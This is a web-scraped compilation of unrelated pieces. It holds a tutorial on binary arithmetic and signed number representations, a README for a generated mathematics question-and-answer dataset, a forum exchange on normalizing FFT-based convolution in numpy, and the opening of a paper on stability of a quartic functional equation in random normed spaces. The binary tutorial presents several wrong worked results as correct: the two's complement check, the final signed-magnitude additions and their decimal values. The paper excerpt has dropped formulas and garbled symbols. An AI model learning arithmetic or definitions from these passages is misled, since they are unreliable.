Add 1 from carry: 10+1=11.\nRecord the 11.\nFinal result: 11001\n\nAlternately:\n\n``` 11 (carry)\n1010\n+1111\n______\n11001\n```\n\nAlways remember\n\n• 0+0=0\n• 1+0=1\n• 1+1=10\n\n``` 111 101 111\n+110 +111 +111\n______ _____ _____\n```\n\n## Binary Multiplication\n\nMultiplication in the binary system works the same way as in the decimal system:\n\n• 1*1=1\n• 1*0=0\n• 0*1=0\n\n``` 101\n* 11\n____\n101\n1010\n_____\n1111\n```\n\nNote that multiplying by two is extremely easy. To multiply by two, just add a 0 on the end.\n\n## Binary Division\n\nFollow the same rules as in decimal division. For the sake of simplicity, throw away the remainder.\n\nFor Example: 111011/11\n\n```\n10011 r 10\n_______\n11)111011\n-11\n______\n101\n-11\n______\n101\n11\n______\n10\n```\n\n## Decimal to Binary\n\nConverting from decimal to binary notation is slightly more difficult conceptually, but can easily be done once you know how through the use of algorithms. Begin by thinking of a few examples. We can easily see that the number 3= 2+1. and that this is equivalent to (1*2^1)+(1*2^0). This translates into putting a \"1\" in the 2^1 column and a \"1\" in the 2^0 column, to get \"11\". Almost as intuitive is the number 5: it is obviously 4+1, which is the same as saying [(2*2) +1], or 2^2+1. This can also be written as [(1*2^2)+(1*2^0)]. Looking at this in columns,\n\n``` 2^2 | 2^1 | 2^0\n1 0 1\n```\nor 101.\n\nWhat we're doing here is finding the largest power of two within the number (2^2=4 is the largest power of 2 in 5), subtracting that from the number (5-4=1), and finding the largest power of 2 in the remainder (2^0=1 is the largest power of 2 in 1). Then we just put this into columns. This process continues until we have a remainder of 0. Let's take a look at how it works. We know that:\n\n``` 2^0=1\n2^1=2\n2^2=4\n2^3=8\n2^4=16\n2^5=32\n2^6=64\n2^7=128\n```\nand so on. To convert the decimal number 75 to binary, we would find the largest power of 2 less than 75, which is 64. Thus, we would put a 1 in the 2^6 column, and subtract 64 from 75, giving us 11. The largest power of 2 in 11 is 8, or 2^3. Put 1 in the 2^3 column, and 0 in 2^4 and 2^5. Subtract 8 from 11 to get 3. Put 1 in the 2^1 column, 0 in 2^2, and subtract 2 from 3. We're left with 1, which goes in 2^0, and we subtract one to get zero. Thus, our number is 1001011.\n\nMaking this algorithm a bit more formal gives us:\n\n1. Let D=number we wish to convert from decimal to binary\n2. Repeat until D=0\n• a. Find the largest power of two in D. Let this equal P.\n• b. Put a 1 in binary column P.\n• c. Subtract P from D.\n3. Put zeros in all columns which don't have ones.\nThis algorithm is a bit awkward. Particularly step 3, \"filling in the zeros.\" Therefore, we should rewrite it such that we ascertain the value of each column individually, putting in 0's and 1's as we go:\n\n1. Let D= the number we wish to convert from decimal to binary\n2. Find P, such that 2^P is the largest power of two smaller than D.\n3. Repeat until P<0\n• If 2^P<=D then\n• put 1 into column P\n• subtract 2^P from D\n• Else\n• put 0 into column P\n• End if\n• Subtract 1 from P\n\nNow that we have an algorithm, we can use it to convert numbers from decimal to binary relatively painlessly. Let's try the number D=55.\n\n• Our first step is to find P. We know that 2^4=16, 2^5=32, and 2^6=64. Therefore, P=5.\n• 2^5<=55, so we put a 1 in the 2^5 column: `1-----`.\n• Subtracting 55-32 leaves us with 23. 
Subtracting 1 from P gives us 4.\n• Following step 3 again, 2^4<=23, so we put a 1 in the 2^4 column: `11----`.\n• Next, subtract 16 from 23, to get 7. Subtract 1 from P gives us 3.\n• 2^3>7, so we put a 0 in the 2^3 column: `110---`\n• Next, subtract 1 from P, which gives us 2.\n• 2^2<=7, so we put a 1 in the 2^2 column: `1101--`\n• Subtract 4 from 7 to get 3. Subtract 1 from P to get 1.\n• 2^1<=3, so we put a 1 in the 2^1 column: `11011-`\n• Subtract 2 from 3 to get 1. Subtract 1 from P to get 0.\n• 2^0<=1, so we put a 1 in the 2^0 column: `110111`\n• Subtract 1 from 1 to get 0. Subtract 1 from P to get -1.\n• P is now less than zero, so we stop.\n\n### Another algorithm for converting decimal to binary\n\nHowever, this is not the only approach possible. We can start at the right, rather than the left.\n\nAll binary numbers are in the form\n\n```a[n]*2^n + a[n-1]*2^(n-1)+...+a*2^1 + a*2^0\n```\nwhere each a[i] is either a 1 or a 0 (the only possible digits for the binary system). The only way a number can be odd is if it has a 1 in the 2^0 column, because all powers of two greater than 0 are even numbers (2, 4, 8, 16...). This gives us the rightmost digit as a starting point.\n\nNow we need to do the remaining digits. One idea is to \"shift\" them. It is also easy to see that multiplying and dividing by 2 shifts everything by one column: two in binary is 10, or (1*2^1). Dividing (1*2^1) by 2 gives us (1*2^0), or just a 1 in binary. Similarly, multiplying by 2 shifts in the other direction: (1*2^1)*2=(1*2^2) or 10 in binary. Therefore\n\n```{a[n]*2^n + a[n-1]*2^(n-1) + ... + a*2^1 + a*2^0}/2\n```\n\nis equal to\n\n```a[n]*2^(n-1) + a[n-1]*2^(n-2) + ... + a2^0\n```\n\nLet's look at how this can help us convert from decimal to binary. Take the number 163. We know that since it is odd, there must be a 1 in the 2^0 column (a=1). We also know that it equals 162+1. If we put the 1 in the 2^0 column, we have 162 left, and have to decide how to translate the remaining digits.\n\nTwo's column: Dividing 162 by 2 gives 81. The number 81 in binary would also have a 1 in the 2^0 column. Since we divided the number by two, we \"took out\" one power of two. Similarly, the statement a[n-1]*2^(n-1) + a[n-2]*2^(n-2) + ... + a*2^0 has a power of two removed. Our \"new\" 2^0 column now contains a1. We learned earlier that there is a 1 in the 2^0 column if the number is odd. Since 81 is odd, a=1. Practically, we can simply keep a \"running total\", which now stands at 11 (a=1 and a=1). Also note that a1 is essentially \"remultiplied\" by two just by putting it in front of a, so it is automatically fit into the correct column.\n\nFour's column: Now we can subtract 1 from 81 to see what remainder we still must place (80). Dividing 80 by 2 gives 40. Therefore, there must be a 0 in the 4's column, (because what we are actually placing is a 2^0 column, and the number is not odd).\n\nEight's column: We can divide by two again to get 20. This is even, so we put a 0 in the 8's column. Our running total now stands at a=0, a=0, a=1, and a=1.\n\nWe can continue in this manner until there is no remainder to place.\n\n``` Let's formalize this algorithm:\n1. Let D= the number we wish to convert from decimal to binary.\n2. Repeat until D=0:\na) If D is odd, put \"1\" in the leftmost open column, and subtract 1 from D.\nb) If D is even, put \"0\" in the leftmost open column.\nc) Divide D by 2.\nEnd Repeat\nFor the number 163, this works as follows:\n1. Let D=163\n2. 
b) D is odd, put a 1 in the 2^0 column.\nSubtract 1 from D to get 162.\nc) Divide D=162 by 2.\nTemporary Result: 01 New D=81\nD does not equal 0, so we repeat step 2.\n\n2. b) D is odd, put a 1 in the 2^1 column.\nSubtract 1 from D to get 80.\nc) Divide D=80 by 2.\nTemporary Result: 11 New D=40\nD does not equal 0, so we repeat step 2.\n\n2. b) D is even, put a 0 in the 2^2 column.\nc) Divide D by 2.\nTemporary Result:011 New D=20\n\n2. b) D is even, put a 0 in the 2^3 column.\nc) Divide D by 2.\nTemporary Result: 0011 New D=10\n\n2. b) D is even, put a 0 in the 2^4 column.\nc) Divide D by 2.\nTemporary Result: 00011 New D=5\n\n2. a) D is odd, put a 1 in the 2^5 column.\nSubtract 1 from D to get 4.\nc) Divide D by 2.\nTemporary Result: 100011 New D=2\n\n2. b) D is even, put a 0 in the 2^6 column.\nc) Divide D by 2.\nTemporary Result: 0100011 New D=1\n\n2. a) D is odd, put a 1 in the 27 column.\nSubtract 1 from D to get D=0.\nc) Divide D by 2.\nTemporary Result: 10100011 New D=0\n\nD=0, so we are done, and the decimal number 163 is equivalent to the binary number 10100011.```\n\nSince we already knew how to convert from binary to decimal, we can easily verify our result. 10100011=(1*2^0)+(1*2^1)+(1*2^5)+(1*2^7)=1+2+32+128= 163.\n\n## Negation in the Binary System\n\nThese techniques work well for non-negative integers, but how do we indicate negative numbers in the binary system?\n\nBefore we investigate negative numbers, we note that the computer uses a fixed number of \"bits\" or binary digits. An 8-bit number is 8 digits long. For this section, we will work with 8 bits.\n\nSigned Magnitude:\n\nThe simplest way to indicate negation is signed magnitude. In signed magnitude, the left-most bit is not actually part of the number, but is just the equivalent of a +/- sign. \"0\" indicates that the number is positive, \"1\" indicates negative. In 8 bits, 00001100 would be 12 (break this down into (1*2^3) + (1*2^2) ). To indicate -12, we would simply put a \"1\" rather than a \"0\" as the first bit: 10001100.\n\nOne's Complement:\n\nIn one's complement, positive numbers are represented as usual in regular binary. However, negative numbers are represented differently. To negate a number, replace all zeros with ones, and ones with zeros - flip the bits. Thus, 12 would be 00001100, and -12 would be 11110011. As in signed magnitude, the leftmost bit indicates the sign (1 is negative, 0 is positive). To compute the value of a negative number, flip the bits and translate as before.\n\nTwo's Complement:\n\nBegin with the number in one's complement. Add 1 if the number is negative. Twelve would be represented as 00001100, and -12 as 11110100. To verify this, let's subtract 1 from 11110110, to get 11110011. If we flip the bits, we get 00001100, or 12 in decimal.\n\nExcess 2^(m-1):\n\nIn this notation, \"m\" indicates the total number of bits. For us (working with 8 bits), it would be excess 2^7. To represent a number (positive or negative) in excess 2^7, begin by taking the number in regular binary representation. Then add 2^7 (=128) to that number. For example, 7 would be 128 + 7=135, or 2^7+2^2+2^1+2^0, and, in binary,10000111. 
We would represent -7 as 128-7=121, and, in binary, 01111001.\n\nNote:\n\n• Unless you know which representation has been used, you cannot figure out the value of a number.\n• A number in excess 2^(m-1) is the same as that number in two's complement with the leftmost bit flipped.\n\nTo see the advantages and disadvantages of each method, let's try working with them.\n\n### What would the binary number 1011 be in decimal notation?\n\n``` 1011=(1*2^3)+(0*2^2)+(1*2^1)+(1*2^0)\n= (1*8) + (0*4) + (1*2) + (1*1)\n= 11 (in decimal notation)\n```\nGo back to the question\n\n### Try converting these numbers from binary to decimal:\n\n```10=(1*2^1) + (0*2^0) = 2+0 = 2\n111 = (1*2^2) + (1*2^1) + (1*2^0) = 4+2+1=7\n10101= (1*2^4) + (0*2^3) + (1*2^2) + (0*2^1) + (1*2^0)=16+0+4+0+1=21\n11110= (1*2^4) + (1*2^3) + (1*2^2) + (1*2^1) + (0*2^0)=16+8+4+2+0=30\n```\nGo back to the question\n\n### Try a few examples of binary addition:\n\n``` 1 1\n111 111 111\n+110 +110 +110\n______ ______ _____\n1 01 1101\n\n1 11 1\n101 101 101\n+111 +111 +111\n_____ ____ _____\n0 00 1100\n\n1 1 1\n111 111 111\n+111 +111 +111\n_____ _____ _____\n0 10 1110\n```\n\nUsing the regular algorithm for binary adition, add (5+12), (-5+12), (-12+-5), and (12+-12) in each system. Then convert back to decimal numbers.\n\n```Signed Magnitude:\n\n5+12 -5+12 -12+-5 12+-12\n\n00000101 10000101 10001100 00001100\n00001100 00001100 10000101 10001100\n__________ ________ ________ _________\n00010001 10010001 00010000 10011000\n\n17 -17 16 -24\n\nOne' Complement:\n\n00000101 11111010 11110011 00001100\n00001100 00001100 11111010 11110011\n_________ ________ ________ ________\n00010001 00000110 11101101 11111111\n\n17 6 -18 0\n\nTwo's Complement:\n\n00000101 11111011 11110100 00001100\n00001100 00001100 11111011 11110100\n________ ________ ________ ________\n00010001 00000111 11101111 00000000\n\n17 7 -17 0\n\nSigned Magnitude:\n\n10000101 01111011 01110100 00001100\n10001100 10001100 01111011 01110100\n________ ________ ________ ________\n00010001 00000111 11101111 01111100\n\n109 119 111 124\n```" ]
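The algorithms above translate almost directly into code. The sketch below, in Python purely for illustration, implements the repeated-division conversion, its inverse, and 8-bit two's-complement encoding, and reproduces the worked values from this page.

```python
def decimal_to_binary(d):
    """Repeated division by 2 (the second algorithm above): each remainder
    becomes the next bit, building the result from right to left."""
    if d == 0:
        return "0"
    bits = ""
    while d > 0:
        bits = ("1" if d % 2 == 1 else "0") + bits
        d //= 2
    return bits

def binary_to_decimal(bits):
    """Sum of digit * 2^column, exactly as in the worked examples."""
    return sum(int(bit) * 2 ** i for i, bit in enumerate(reversed(bits)))

def twos_complement(n, width=8):
    """Two's complement of n in `width` bits: for negative n this equals
    flipping the bits of |n| and adding 1."""
    if n >= 0:
        return format(n, f"0{width}b")
    return format((1 << width) + n, f"0{width}b")

print(decimal_to_binary(163))          # 10100011
print(binary_to_decimal("10100011"))   # 163
print(twos_complement(12))             # 00001100
print(twos_complement(-12))            # 11110100
```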
https://github.com/deepmind/mathematics_dataset?utm_campaign=DataScience_Digest&utm_medium=email&utm_source=Revue%20newsletter
[ "Skip to content\n\n# deepmind/mathematics_dataset\n\nNo description, website, or topics provided.\ndavidsaxton Merge pull request #1 from javierlorenzod/patch-1\n`Fixed Markdown typo in README.md`\nLatest commit 4c39d1f Apr 4, 2019\nType Name Latest commit message Commit time\nFailed to load latest commit information.", null, "mathematics_dataset Apr 3, 2019", null, "CONTRIBUTING.md Feb 13, 2019", null, "LICENSE Feb 13, 2019", null, "README.md Apr 3, 2019", null, "setup.py Apr 3, 2019\n\n# Mathematics Dataset\n\nThis dataset code generates mathematical question and answer pairs, from a range of question types at roughly school-level difficulty. This is designed to test the mathematical learning and algebraic reasoning skills of learning models.\n\nOriginal paper: Analysing Mathematical Reasoning Abilities of Neural Models (Saxton, Grefenstette, Hill, Kohli).\n\n## Example questions\n\n``````Question: Solve -42*r + 27*c = -1167 and 130*r + 4*c = 372 for r.\nAnswer: 4\n\nQuestion: Calculate -841880142.544 + 411127.\nAnswer: -841469015.544\n\nQuestion: Let x(g) = 9*g + 1. Let q(c) = 2*c + 1. Let f(i) = 3*i - 39. Let w(j) = q(x(j)). Calculate f(w(a)).\nAnswer: 54*a - 30\n\nQuestion: Let e(l) = l - 6. Is 2 a factor of both e(9) and 2?\nAnswer: False\n\nQuestion: Let u(n) = -n**3 - n**2. Let e(c) = -2*c**3 + c. Let l(j) = -118*e(j) + 54*u(j). What is the derivative of l(a)?\nAnswer: 546*a**2 - 108*a - 118\n\nQuestion: Three letters picked without replacement from qqqkkklkqkkk. Give prob of sequence qql.\nAnswer: 1/110\n``````\n\n## Pre-generated data\n\nPre-generated files\n\n### Version 1.0\n\nThis is the version released with the original paper. It contains 2 million (question, answer) pairs per module, with questions limited to 160 characters in length, and answers to 30 characters in length. Note the training data for each question type is split into \"train-easy\", \"train-medium\", and \"train-hard\". This allows training models via a curriculum. The data can also be mixed together uniformly from these training datasets to obtain the results reported in the paper. Categories:\n\n• algebra (linear equations, polynomial roots, sequences)\n• arithmetic (pairwise operations and mixed expressions, surds)\n• calculus (differentiation)\n• comparison (closest numbers, pairwise comparisons, sorting)\n• measurement (conversion, working with time)\n• numbers (base conversion, remainders, common divisors and multiples, primality, place value, rounding numbers)\n• polynomials (addition, simplification, composition, evaluating, expansion)\n• probability (sampling without replacement)\n\n## Getting the source\n\n### PyPI\n\nThe easiest way to get the source is to use pip:\n\n`\\$ pip install mathematics_dataset`\n\n### From GitHub\n\nAlternately you can get the source by cloning the mathematics_dataset repository:\n\n```\\$ git clone https://github.com/deepmind/mathematics_dataset\n\\$ pip install --upgrade mathematics_dataset/```\n\n## Generating examples\n\nGenerated examples can be printed to stdout via the `generate` script. For example:\n\n`python -m mathematics_dataset.generate --filter=linear_1d`\n\nwill generate example (question, answer) pairs for solving linear equations in one variable.\n\nWe've also included `generate_to_file.py` as an example of how to write the generated examples to text files. You can use this directly, or adapt it for your generation and training needs.\n\nYou can’t perform that action at this time." ]
[ null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7999936,"math_prob":0.84105086,"size":2762,"snap":"2019-13-2019-22","text_gpt3_token_len":687,"char_repetition_ratio":0.12327774,"word_repetition_ratio":0.0,"special_character_ratio":0.262853,"punctuation_ratio":0.15369262,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9948008,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-21T07:01:07Z\",\"WARC-Record-ID\":\"<urn:uuid:e32b7c0f-30e6-4c9f-893e-ff82a537f2c9>\",\"Content-Length\":\"89023\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3dfabd1e-1f11-4730-b52f-d3efd6e2e698>\",\"WARC-Concurrent-To\":\"<urn:uuid:b3bb26b5-f15f-4aa8-8119-06132ec44206>\",\"WARC-IP-Address\":\"192.30.253.112\",\"WARC-Target-URI\":\"https://github.com/deepmind/mathematics_dataset?utm_campaign=DataScience_Digest&utm_medium=email&utm_source=Revue%20newsletter\",\"WARC-Payload-Digest\":\"sha1:HLXVGWIGDZACMKEKRNS6LNTFAUOKM3UZ\",\"WARC-Block-Digest\":\"sha1:TA5ZGSIEQ5JFFGVAP3JWVEGRPUZTPZWO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232256281.35_warc_CC-MAIN-20190521062300-20190521084300-00386.warc.gz\"}"}
https://scicomp.stackexchange.com/questions/25950/wrong-amplitude-of-convolution-using-numpy-fft/32988
[ "# Wrong amplitude of convolution using numpy fft\n\nI try to convolve a rectangle function in [-1/2, 1/2] with itself using fft. The convolution should be a tent shaped function, see figure below.", null, "The code is below. In the 3rd to last line I add /50 so it appears correct - I have no idea what the normalization factor should be. And my question is how to normalize the power of a fft result, so the subsequent application of ifft gives the correct result?\n\nimport numpy as np\nfrom numpy.fft import fft, ifft, fftshift, ifftshift\nN = 1000\nt=np.linspace(-10, 10, N)\ndt = t-t\n\ndata = 1.0*(np.abs(t)<0.5)\ndata_fft = np.fft.fft(data)\n\nplt.hold(1)\nplt.plot(t, (ifft(data_fft**1)), 'r')\nplt.plot(t, ifftshift(ifft(data_fft**2)) / 50.0, 'g')\nplt.xlim(-4,4)\nplt.show()\n\n• The np.fft computations are correct; what is incorrect is that you expect these computations to give different results. It appears that you trying to verify Fourier transform properties of continuous-time signals by discretizing the latter and applying discrete Fourier transform (FFT). I would not recommend this approach due to subtle but critical differences between the continuous and discrete time domains. – Stelios Jan 17 '17 at 12:25\n• @Stelios You are exact right, I am trying to verify the convolution property of the continuous Fourier transform. Could you please elaborate on the \"subtle but critical differences\"? I was expecting a straightforward relation between the two, no more than some normalization. – Taozi Jan 17 '17 at 14:14\n• This is a rather deep topic. Just to give you an idea, consider for example the rectangular pulse signal. Whereas the continuous-time version has a well defined notion of \"area\", which is obtained by integration of the singal and is equal to 1, no such notion exists for the discrete-time version. The only \"similar\" quantity in the discrete-time version is the sum of the sample values, which is equal to 50. However this value will be different if you choose a different sampling period (dt). – Stelios Jan 17 '17 at 15:25\n• @Stelios Thank you for your reply. But how about the sampling \"interval\" of the rectangle function. If you discretize it into 50 points, then the gap between the samples is 1/50. With numerical integration like the rectangle rule, you still have area 1 -- and this is independent of how many sample you use if you consider it from a numerical integration perspective. – Taozi Jan 17 '17 at 15:38\n• Sure, however, this observation is relevant in the case where you want to compute the Fourier integrals numerically. In that case you should do the integration manually (or using a numerical integration function) and not use (I)FFT. The (I)FFT algorithm does not incorporate any sampling period information, i.e., it always implicitly assumes a normalized sampling period of 1. 
– Stelios Jan 17 '17 at 15:47\n\nYou actually do recover the convolution, but as discussed in the comments, there is a normalization issue due to discretization.\n\nAccording to the documentation, fft is implemented like this:\n\n$$A_k = \sum_{m=0}^{n-1} a_m \exp \{ - 2\pi i \frac{mk}{n} \}$$\n\nwith $$A_k$$ being the Fourier coefficients, $$a_m$$ the $$m$$-th element of your signal vector and $$n$$ the length of the signal.\n\nSquaring this gives you\n\n$$A_k^2 = \sum_{m=0}^{n-1} \sum_{m'=0}^{n-1} a_m a_{m'} \exp\{ - 2\pi i \frac{(m+m')k}{n} \}$$\n\nNow, applying ifft to the squared Fourier transform gives you, using the ifft-definition from the documentation:\n\n$$\text{ifft}(A_k^2)_{m''} = \frac{1}{n} \sum_{k=0}^{n-1} \sum_{m=0}^{n-1} \sum_{m'=0}^{n-1} a_m a_{m'} \exp\{ - 2\pi i \frac{(m+m'-m'')k}{n} \}$$\n\nWith the observation that\n\n$$\frac{1}{n} \sum_{k=0}^{n-1} \exp\{ - 2\pi i \frac{(m+m'-m'')k}{n} \} = \delta_{m+m', m''}$$\n\nyou end up with\n\n$$\text{ifft}(A_k^2)_{m''} = \sum_{m=0}^{n-1} \sum_{m'=0}^{n-1} a_m a_{m'} \delta_{m+m', m''} = \sum_{m=0}^{n-1} a_m a_{m'' - m}$$\n\nThis is actually how np.convolve is defined (except for some padding). If you use np.convolve on your data, you end up with the same result (except for some padding), so within the numpy world, you did exactly what you set out to do, i.e. verify the convolution property of the Fourier transform. As noted in the comments however, neither fft nor convolve "know" anything about your discretization, so you have to take care of that manually by multiplying the results with dt." ]
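To make that conclusion concrete, here is a short numpy check (not part of the original post) on the same grid as in the question: the inverse FFT of the squared spectrum reproduces the circular discrete convolution exactly, and multiplying by the sample spacing `dt` turns it into an approximation of the continuous convolution — the unit triangle — with no magic factor of 50.

```python
import numpy as np

N = 1000
t = np.linspace(-10, 10, N)
dt = t[1] - t[0]
data = 1.0 * (np.abs(t) < 0.5)

# ifft(fft(data)**2) is the *circular* discrete convolution of data with itself.
raw = np.real(np.fft.ifft(np.fft.fft(data) ** 2))

# Build the same circular convolution from np.convolve by wrapping the tail.
full = np.convolve(data, data)          # linear convolution, length 2N-1
circ = full[:N].copy()
circ[: N - 1] += full[N:]               # alias the part that sticks out past N
print(np.allclose(raw, circ))           # True: identical up to round-off

# Scaling by dt gives a Riemann-sum approximation of the continuous convolution,
# which for the unit rectangle is the unit triangle; fftshift re-centres it on t = 0.
approx = dt * np.fft.fftshift(raw)
triangle = np.maximum(1.0 - np.abs(t), 0.0)
print(np.max(np.abs(approx - triangle)) < 2 * dt)   # True: error is O(dt), not O(1)
```

The same scaling fixes the original plot: `plt.plot(t, dt * fftshift(ifft(data_fft**2)).real)` replaces the ad-hoc `/ 50.0` — on this grid `1/dt ≈ 50`, which is where that magic number came from.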
[ null, "https://i.stack.imgur.com/TKiIX.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8220627,"math_prob":0.99591887,"size":2312,"snap":"2021-31-2021-39","text_gpt3_token_len":738,"char_repetition_ratio":0.11915078,"word_repetition_ratio":0.041899443,"special_character_ratio":0.33088234,"punctuation_ratio":0.088552915,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999248,"pos_list":[0,1,2],"im_url_duplicate_count":[null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T02:28:53Z\",\"WARC-Record-ID\":\"<urn:uuid:7377bd6d-eaf9-4a4c-88bc-35707986a62a>\",\"Content-Length\":\"173219\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7430bcc8-b47a-4577-a80d-17ca8035cd42>\",\"WARC-Concurrent-To\":\"<urn:uuid:f1fef8ee-173f-4daf-91a9-7f29f298d472>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://scicomp.stackexchange.com/questions/25950/wrong-amplitude-of-convolution-using-numpy-fft/32988\",\"WARC-Payload-Digest\":\"sha1:QL7EU3I5L7XC7KOAYHNWY54JJVKTZNHS\",\"WARC-Block-Digest\":\"sha1:OEIRAZPHCBCDZ4L44YHP5CGJTUPGSDKP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152168.38_warc_CC-MAIN-20210727010203-20210727040203-00462.warc.gz\"}"}
https://journalofinequalitiesandapplications.springeropen.com/articles/10.1186/1029-242X-2011-62
[ "Skip to main content\n\n# On nonlinear stability in various random normed spaces\n\n## Abstract\n\nIn this article, we prove the nonlinear stability of the quartic functional equation\n\nin the setting of random normed spaces Furthermore, the interdisciplinary relation among the theory of random spaces, the theory of non-Archimedean space, the theory of fixed point theory, the theory of intuitionistic spaces and the theory of functional equations are also presented in the article.\n\n## 1. Introduction\n\nThe study of stability problems for functional equations is related to a question of Ulam concerning the stability of group homomorphisms and affirmatively answered for Banach spaces by Hyers . Subsequently, this result of Hyers was generalized by Aoki for additive mappings and by Rassias for linear mappings by considering an unbounded Cauchy difference. The article of Rassias has provided a lot of influence in the development of what we now call generalized Ulam-Hyers stability of functional equations. We refer the interested readers for more information on such problems to the article .\n\nRecently, Alsina , Chang, et al. , Mirmostafaee et al. , , Miheţ and Radu , Miheţ et al. , , , , Baktash et al. , Eshaghi et al. , Saadati et al. , investigated the stability in the settings of fuzzy, probabilistic, and random normed spaces.\n\nIn this article, we study the stability of the following functional equation\n\n(1.1)\n\nin the various random normed spaces via different methods. Since ax4 is a solution of above functional equation, we say it quartic functional equation.\n\n## 2. Preliminaries\n\nIn this section, we recall some definitions and results which will be used later on in the article.\n\nA triangular norm (shorter t-norm) is a binary operation on the unit interval [0, 1], i.e., a function T : [0, 1] × [0, 1] → [0, 1] such that for all a, b, c [0, 1] the following four axioms satisfied:\n\n1. (i)\n\nT(a, b) = T(b, a) (commutativity);\n\n2. (ii)\n\nT(a, (T(b, c))) = T(T(a, b), c) (associativity);\n\n3. (iii)\n\nT(a, 1) = a (boundary condition);\n\n4. (iv)\n\nT(a, b) ≤ T(a, c) whenever bc (monotonicity).\n\nBasic examples are the Lukasiewicz t-norm T L , T L (a, b) = max (a + b - 1, 0) a, b [0, 1] and the t-norms T P , T M , T D , where T P (a, b) := ab, T M (a, b) := min {a, b},\n\n$T D ( a , b ) : = min ( a , b ) , if max ( a , b ) = 1 ; 0 , otherwise .$\n\nIf T is a t-norm then $x T ( n )$ is defined for every x [0, 1] and n N {0} by 1, if n = 0 and $T ( x T ( n - 1 ) , x )$, if n ≥ 1. A t-norm T is said to be of Hadžić-type (we denote by $T∈H$) if the family $( x T ( n ) ) n ∈ N$ is equicontinuous at x = 1 (cf. 
).\n\nOther important triangular norms are (see ):\n\n• the Sugeno-Weber family ${ T λ S W } λ ∈ [ - 1 , ∞ ]$ is defined by $T - 1 S W = T D$, $T ∞ S W = T P$ and\n\n$T λ S W ( x , y ) = max 0 , x + y - 1 + λ x y 1 + λ$\n\nif λ (-1, ∞).\n\n• the Domby family ${ T λ D } λ ∈ [ 0 , ∞ ]$, defined by T D , if λ = 0, T M , if λ = ∞ and\n\n$T λ D ( x , y ) = 1 1 + ( ( 1 − x x ) λ + ( 1 − y y ) λ ) 1 / λ$\n\nif λ (0, ∞).\n\n• the Aczel-Alsina family ${ T λ A A } λ ∈ [ 0 , ∞ ]$, defined by T D , if λ = 0, T M , if λ = ∞ and\n\n$T λ A A ( x , y ) = e - ( | log x | λ + | log y | λ ) 1 ∕ λ$\n\nif λ (0, ∞).\n\nA t-norm T can be extended (by associativity) in a unique way to an n-array operation taking for (x1, ..., x n ) [0, 1]n the value T (x1, ..., x n ) defined by\n\n$T i = 1 0 x i = 1 , T i = 1 n x i = T ( T i = 1 n - 1 x i , x n ) = T ( x 1 , … , x n ) .$\n\nT can also be extended to a countable operation taking for any sequence (x n )nNin [0, 1] the value\n\n$T i = 1 ∞ x i = lim n → ∞ T i = 1 n x i .$\n(2.1)\n\nThe limit on the right side of (2.1) exists since the sequence ${ T i = 1 n x i } n ∈ ℕ$ is non-increasing and bounded from below.\n\nProposition 2.1. (i) For TT L the following implication holds:\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1 ⇔ ∑ n = 1 ∞ ( 1 - x n ) < ∞ .$\n\n(ii) If T is of Hadžić-type then\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1$\n\nfor every sequence {x n }nNin [0, 1] such that limn→∞x n = 1.\n\n(iii) If $T∈ { T λ A A } λ ∈ ( 0 , ∞ ) ∪ { T λ D } λ ∈ ( 0 , ∞ )$, then\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1 ⇔ ∑ n = 1 ∞ ( 1 - x n ) α < ∞ .$\n\n(iv) If $T∈ { T λ S W } λ ∈ [ - 1 , ∞ )$, then\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1 ⇔ ∑ n = 1 ∞ ( 1 - x n ) < ∞ .$\n\nDefinition 2.2. A random normed space (briefly, RN-space) is a triple (X, μ, T), where X is a vector space, T is a continuous t-norm, and μ is a mapping from X into D+ such that, the following conditions hold:\n\n(RN1) μ x (t) = ε0(t) for all t > 0 if and only if x = 0;\n\n(RN2) $μ α x ( t ) = μ x t | α |$ for all x X, α ≠ 0;\n\n(RN3) μx+y(t + s) ≥ T (μ x (t), μ y (s)) for all x, y, z X and t, s ≥ 0.\n\nDefinition 2.3. Let (X, μ, T) be an RN-space.\n\n1. (1)\n\nA sequence {x n } in X is said to be convergent to x in X if, for every ε > 0 and λ > 0, there exists a positive integer N such that $μ x n - x ( ε ) >1-λ$ whenever nN.\n\n2. (2)\n\nA sequence {x n } in X is called Cauchy if, for every ε > 0 and λ > 0, there exists a positive integer N such that $μ x n - x m ( ε ) >1-λ$ whenever nmN.\n\n3. (3)\n\nAn RN-space (X, μ, T) is said to be complete if every Cauchy sequence in X is convergent to a point in X.\n\nTheorem 2.4. If (X, μ, T) is an RN-space and {x n } is a sequence such that x n x, then $lim n → ∞ μ x n ( t ) = μ x ( t )$ almost everywhere.\n\n## 3. Non-Archimedean random normed space\n\nBy a non-Archimedean field we mean a field $K$ equipped with a function (valuation) | · | from K into [0, ∞] such that |r| = 0 if and only if r = 0, |rs| = |r| |s|, and |r + s| ≤ max{|r|, |s|} for all $r,s∈K$. Clearly |1| = | -1| = 1 and |n| ≤ 1 for all n . By the trivial valuation we mean the mapping | · | taking everything but 0 into 1 and |0| = 0. Let $X$ be a vector space over a 